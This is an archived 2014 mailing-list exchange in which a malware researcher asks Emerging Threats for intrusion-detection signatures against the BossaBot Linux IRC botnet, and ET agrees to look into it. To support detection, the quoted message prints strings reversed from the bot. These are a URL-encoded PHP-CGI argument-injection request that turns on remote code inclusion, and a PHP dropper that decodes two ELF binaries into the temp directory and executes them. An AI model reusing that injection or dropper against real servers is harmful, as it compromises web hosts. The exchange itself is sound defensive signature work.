[prev in list] [next in list] [prev in thread] [next in thread]
List: emerging-sigs
Subject: Re: [Emerging-Sigs] Request #3 - ET Signature for Linux Bossabot
From: Will Metcalf <wmetcalf () emergingthreatspro ! com>
Date: 2014-09-22 2:02:15
Message-ID: 821E7BCD-6B0B-4156-A2D7-9DE0D7F3B794 () emergingthreatspro ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Rick,
We will look into everything you sent us today and try to have something out tomorrow \
for anything that isn't already covered. Thanks again!
Regards,
Will
> On Sep 21, 2014, at 8:09 PM, Hendrik Adrian <1@1rik.com> wrote:
>
> Hello Will,
> CC: ..and ET friends,
>
> There is one more request. A route of Kaiten base code DDoS'er, was recoded into an \
> active evil botnet (IRC base), the actor called it as BossaBot. Assisting Mr. \
> Malekal Morte I am in charge to reversing the ELF binaries, since 1st time the RFI \
> attack spotted and botnet was spotted in some forum.
> These are good chronological reference of the threat:
> Malekal's report: http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/
> My reversing in monitoring this ELF threat: \
> http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965 \
> Spiderlabs posted about this threat too: \
> http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html
>
> ...according to posts above you will see that the threat is important to handle.
>
> If ET sig doesn't cover this threat yet..I would like to request the ET sig to \
> block this RFI and the PHP infection (or "injection" is more like it). If you think \
> you have, please see the below details, in case anything can be improved.
> The problem of this proposal is, since the botnet attack request can only be \
> activated from the actor's IRC, it is a bit difficult to simulate the attack to \
> make a good capture PCAP (I tried many times), so there is no PCAP. But we have \
> THREE information that can be used to replace the PCAP to generate sigs, as per \
> follows:
> (1) RFI and web file injection HTTP header injected log.
>
> The log is available in here: http://pastebin.com/raw.php?i=KUTT2UQa < \
> @undeadsecurity was doing a good work in recording this (a credit)
> (2) The latest ELF binary I reversed, was spotted 2 days ago, contains the below \
> data hard coded in the bins:
> // RFI TO BE SENT HARD CODED:
>
> .rodata:0x0408540 aPostS?2d64616c
> .rodata:0x0408540 db 'POST \
> %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
> .rodata:0x0408540 db \
> '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
> .rodata:0x0408540 db \
> 'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
> .rodata:0x0408540 db \
> '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
> .rodata:0x0408540 db \
> '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
> .rodata:0x0408540 db \
> '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
> .rodata:0x0408540 db \
> '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
> .rodata:0x0408540 db \
> '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
> .rodata:0x0408540 db \
> '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
> .rodata:0x0408540 db \
> '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
> .rodata:0x0408540 db \
> '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
> .rodata:0x0408540 db \
> '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
> .rodata:0x0408540 db \
> '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
> .rodata:0x0408540 db \
> '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
> .rodata:0x0408540 db \
> '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
> .rodata:0x0408540 db 'D%%6E HTTP/1.1',0Dh,0Ah
>
> // ALSO THE ACCOMPANIED DROPPER SCRIPT
>
> .rodata:0x0408540 db 'Host: %s',0Dh,0Ah
> .rodata:0x0408540 db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) \
> Gecko/20100101 '
> .rodata:0x0408540 db 'Firefox/31.0',0Dh,0Ah
> .rodata:0x0408540 db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah
> .rodata:0x0408540 db 'Content-Length: %d',0Dh,0Ah
> .rodata:0x0408540 db 'Connection: close',0Dh,0Ah
> .rodata:0x0408540 db 0Dh,0Ah
> .rodata:0x0408540 db '%s',0
> .rodata:0x04089D5 align 8
> >
> .rodata:0x04089D8 a?phpBufferfSBu
> .rodata:0x04089D8 db '<?php',0Ah ;
> .rodata:0x04089D8 db '$bufferf = ',27h,'%s',27h,';',0Ah
> .rodata:0x04089D8 db '$bufferf2 = ',27h,'%s',27h,';',0Ah
> .rodata:0x04089D8 db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
> .rodata:0x04089D8 db '$Vgxl4ifsipo5 = getcwd();',0Ah
> .rodata:0x04089D8 db '$Vos03apkyec1 = "OIOIU74u";',0Ah
> .rodata:0x04089D8 db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
> .rodata:0x04089D8 db '$V5lgt4awdv3b = "chmod 777";',0Ah
> .rodata:0x04089D8 db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',0Ah
> .rodata:0x04089D8 db '{',0Ah
> .rodata:0x04089D8 db 'exit(1);',0Ah
> .rodata:0x04089D8 db '}else{',0Ah
> .rodata:0x04089D8 db 'echo($Vdkqrxiiyr3t);',0Ah
> .rodata:0x04089D8 db '$bufferf = base64_decode($bufferf);',0Ah
> .rodata:0x04089D8 db '$bufferf2 = base64_decode($bufferf2);',0Ah
> .rodata:0x04089D8 db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", \
> $bufferf);',0Ah
> .rodata:0x04089D8 db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", \
> $bufferf2);',0Ah
> .rodata:0x04089D8 db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
> .rodata:0x04089D8 db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t \
> ."/$Vos03apkyec1");',0Ah
> .rodata:0x04089D8 db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
> .rodata:0x04089D8 db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t \
> ."/$Vos03apkyec2");',0Ah
> .rodata:0x04089D8 db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
> .rodata:0x04089D8 db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
> .rodata:0x04089D8 db 'exit(1);',0Ah
> .rodata:0x04089D8 db '}',0Ah
> .rodata:0x04089D8 db '?>',0Ah,0
> .rodata:0x0408CE9 align 10h
>
> Using the above (1) and (2) we can use the hard coded HTTP HEADER to be blocked by \
> ET Sigs. Moreover, there is one more vector to use as filtration (below):
>
> (3) The injected ELF file to the /tmp directory
>
> <?php
> $bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
> $bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';
>
> ↑the above "$bufferf ="and "$buffer2 =" looks like a good spot to filter. But \
> only new version is using this, old version is using different scheme (without PHP \
> injection but PHP system command to wget the bins..)
> If you need more confirmation, please do not hesitate to ask.
> It will be nice if this threat also can be blocked.
>
> Herewith I close the series of requests for ET sigs from MalwareMustDie, total 3 \
> DDoS botnets signature. Look forward for the reply with thank you in advance.
> Best regards always/Rick
>
> --
> Hendrik Adrian / @unixfreaxjp
> PGP/MIT.EDU: RSA 2048/0xEC61AB9
> http://about.me/unixfreaxjp
>
> MalwareMustDie,NPO Research Group
> Web http://malwaremustdie.org
> Research blog: http://malwaremustdie.blogspot.com
> Wiki & Code: http://code.google.com/p/malwaremustdie/
> Report Pastes: http://pastebin.com/u/MalwareMustDie
>
> This email is confidential and may be legally privileged. It is intended
> as a confidential communication only for the person(s) named above.
> Any other use or disclosure is prohibited.
> If you have received this message in error, please delete it, disregard its \
> contents.
[Attachment #5 (text/html)]
<html><head><meta http-equiv="content-type" content="text/html; \
charset=utf-8"></head><body dir="auto"><div>Rick,</div><div><br></div><div>We will \
look into everything you sent us today and try to have something out tomorrow for \
anything that isn't already covered. Thanks \
again!</div><div><br></div><div>Regards,</div><div><br></div><div>Will<br></div><div><br>On \
Sep 21, 2014, at 8:09 PM, Hendrik Adrian <<a \
href="mailto:1@1rik.com">1@1rik.com</a>> wrote:<br><br></div><blockquote \
type="cite"><div><div dir="ltr"><div><div><div><div><div><div><div><div>Hello \
Will,<br>CC: ..and ET friends,<br><br>There is one more request. A route of Kaiten \
base code DDoS'er, was recoded into an active evil botnet (IRC base), the actor \
called it as BossaBot. Assisting Mr. Malekal Morte I am in charge to reversing the \
ELF binaries, since 1st time the RFI attack spotted and botnet was spotted in some \
forum.<br><br>These are good chronological reference of the threat:<br>Malekal's \
report: <a href="http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-i \
rc/">http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/</a><br>My \
reversing in monitoring this ELF threat: <a \
href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p2396 \
5">http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965</a><br>Spiderlabs \
posted about this threat too: <a \
href="http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-m \
ining-analysis.html">http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html</a><br></div><div>...according \
to posts above you will see that the threat is important to \
handle.<br></div><div><br>If ET sig doesn't cover this threat yet..I would like to \
request the ET sig to block this RFI and the PHP infection (or "injection" is more \
like it). If you think you have, please see the below details, in case anything can \
be improved.<br><br>The problem of this proposal is, since the botnet attack request \
can only be activated from the actor's IRC, it is a bit difficult to simulate the \
attack to make a good capture PCAP (I tried many times), so there is no PCAP. But we \
have THREE information that can be used to replace the PCAP to generate sigs, as per \
follows:<br></div><br></div>(1) RFI and web file injection HTTP header injected \
log.<br><br></div>The log is available in here: <a \
href="http://pastebin.com/raw.php?i=KUTT2UQa">http://pastebin.com/raw.php?i=KUTT2UQa</a> \
< @undeadsecurity was doing a good work in recording this (a \
credit)<br><br></div>(2) The latest ELF binary I reversed, was spotted 2 days ago, \
contains the below data hard coded in the bins:<br><br><div class="" \
style="background-color:rgb(250,250,250);border-color:rgb(187,187,187);border-style:solid;border-width:1px;word-wrap:break-word"><code \
class=""><div class=""><span style="color:rgb(136,0,0)" class="">// RFI TO BE SENT \
HARD CODED:</span><span style="color:rgb(0,0,0)" class=""><br><br></span><span \
style="color:rgb(102,102,0)" class="">.</span><span style="color:rgb(0,0,0)" \
class="">rodata</span><span style="color:rgb(102,102,0)" class="">:</span><span \
style="color:rgb(0,102,102)" class="">0x0408540</span><span style="color:rgb(0,0,0)" \
class=""> aPostS</span><span style="color:rgb(102,102,0)" class="">?</span><span \
style="color:rgb(0,102,102)" class="">2d64616c</span><span style="color:rgb(0,0,0)" \
class=""> <br></span><span style="color:rgb(102,102,0)" class="">.</span><span \
style="color:rgb(0,0,0)" class="">rodata</span><span style="color:rgb(102,102,0)" \
class="">:</span><span style="color:rgb(0,102,102)" class="">0x0408540</span><span \
style="color:rgb(0,0,0)" class=""> db </span><span style="color:rgb(0,136,0)" \
class="">'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" \
class="">'6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" class="">'D%%6E HTTP/1.1'</span><span \
style="color:rgb(102,102,0)" class="">,</span><span style="color:rgb(0,102,102)" \
class="">0Dh</span><span style="color:rgb(102,102,0)" class="">,</span><span \
style="color:rgb(0,102,102)" class="">0Ah</span><span style="color:rgb(0,0,0)" \
class=""><br><br></span><span style="color:rgb(136,0,0)" class="">// ALSO THE \
ACCOMPANIED DROPPER SCRIPT</span><span style="color:rgb(0,0,0)" \
class=""><br><br></span><span style="color:rgb(102,102,0)" class="">.</span><span \
style="color:rgb(0,0,0)" class="">rodata</span><span style="color:rgb(102,102,0)" \
class="">:</span><span style="color:rgb(0,102,102)" class="">0x0408540</span><span \
style="color:rgb(0,0,0)" class=""> db </span><span style="color:rgb(0,136,0)" \
class="">'Host: %s'</span><span style="color:rgb(102,102,0)" class="">,</span><span \
style="color:rgb(0,102,102)" class="">0Dh</span><span style="color:rgb(102,102,0)" \
class="">,</span><span style="color:rgb(0,102,102)" class="">0Ah</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" class="">'User-Agent: Mozilla/5.0 (Windows NT \
5.1; rv:31.0) Gecko/20100101 '</span><span style="color:rgb(0,0,0)" \
class=""><br></span><span style="color:rgb(102,102,0)" class="">.</span><span \
style="color:rgb(0,0,0)" class="">rodata</span><span style="color:rgb(102,102,0)" \
class="">:</span><span style="color:rgb(0,102,102)" class="">0x0408540</span><span \
style="color:rgb(0,0,0)" class=""> db </span><span style="color:rgb(0,136,0)" \
class="">'Firefox/31.0'</span><span style="color:rgb(102,102,0)" \
class="">,</span><span style="color:rgb(0,102,102)" class="">0Dh</span><span \
style="color:rgb(102,102,0)" class="">,</span><span style="color:rgb(0,102,102)" \
class="">0Ah</span><span style="color:rgb(0,0,0)" class=""><br></span><span \
style="color:rgb(102,102,0)" class="">.</span><span style="color:rgb(0,0,0)" \
class="">rodata</span><span style="color:rgb(102,102,0)" class="">:</span><span \
style="color:rgb(0,102,102)" class="">0x0408540</span><span style="color:rgb(0,0,0)" \
class=""> db </span><span style="color:rgb(0,136,0)" class="">'Content-Type: \
application/x-www-form-urlencoded'</span><span style="color:rgb(102,102,0)" \
class="">,</span><span style="color:rgb(0,102,102)" class="">0Dh</span><span \
style="color:rgb(102,102,0)" class="">,</span><span style="color:rgb(0,102,102)" \
class="">0Ah</span><span style="color:rgb(0,0,0)" class=""><br></span><span \
style="color:rgb(102,102,0)" class="">.</span><span style="color:rgb(0,0,0)" \
class="">rodata</span><span style="color:rgb(102,102,0)" class="">:</span><span \
style="color:rgb(0,102,102)" class="">0x0408540</span><span style="color:rgb(0,0,0)" \
class=""> db </span><span style="color:rgb(0,136,0)" class="">'Content-Length: \
%d'</span><span style="color:rgb(102,102,0)" class="">,</span><span \
style="color:rgb(0,102,102)" class="">0Dh</span><span style="color:rgb(102,102,0)" \
class="">,</span><span style="color:rgb(0,102,102)" class="">0Ah</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" class="">'Connection: close'</span><span \
style="color:rgb(102,102,0)" class="">,</span><span style="color:rgb(0,102,102)" \
class="">0Dh</span><span style="color:rgb(102,102,0)" class="">,</span><span \
style="color:rgb(0,102,102)" class="">0Ah</span><span style="color:rgb(0,0,0)" \
class=""><br></span><span style="color:rgb(102,102,0)" class="">.</span><span \
style="color:rgb(0,0,0)" class="">rodata</span><span style="color:rgb(102,102,0)" \
class="">:</span><span style="color:rgb(0,102,102)" class="">0x0408540</span><span \
style="color:rgb(0,0,0)" class=""> db </span><span \
style="color:rgb(0,102,102)" class="">0Dh</span><span style="color:rgb(102,102,0)" \
class="">,</span><span style="color:rgb(0,102,102)" class="">0Ah</span><span \
style="color:rgb(0,0,0)" class=""><br></span><span style="color:rgb(102,102,0)" \
class="">.</span><span style="color:rgb(0,0,0)" class="">rodata</span><span \
style="color:rgb(102,102,0)" class="">:</span><span style="color:rgb(0,102,102)" \
class="">0x0408540</span><span style="color:rgb(0,0,0)" class=""> db \
</span><span style="color:rgb(0,136,0)" class="">'%s'</span><span \
style="color:rgb(102,102,0)" class="">,</span><span style="color:rgb(0,102,102)" \
class="">0</span><span style="color:rgb(0,0,0)" class=""><br></span><span \
style="color:rgb(102,102,0)" class="">.</span><span style="color:rgb(0,0,0)" \
class="">rodata</span><span style="color:rgb(102,102,0)" class="">:</span><span \
style="color:rgb(0,102,102)" class="">0x04089D5</span><span style="color:rgb(0,0,0)" \
</div></blockquote></body></html>
_______________________________________________
Emerging-sigs mailing list
Emerging-sigs@lists.emergingthreats.net
https://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
Support Emerging Threats! Subscribe to Emerging Threats Pro http://www.emergingthreats.net
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic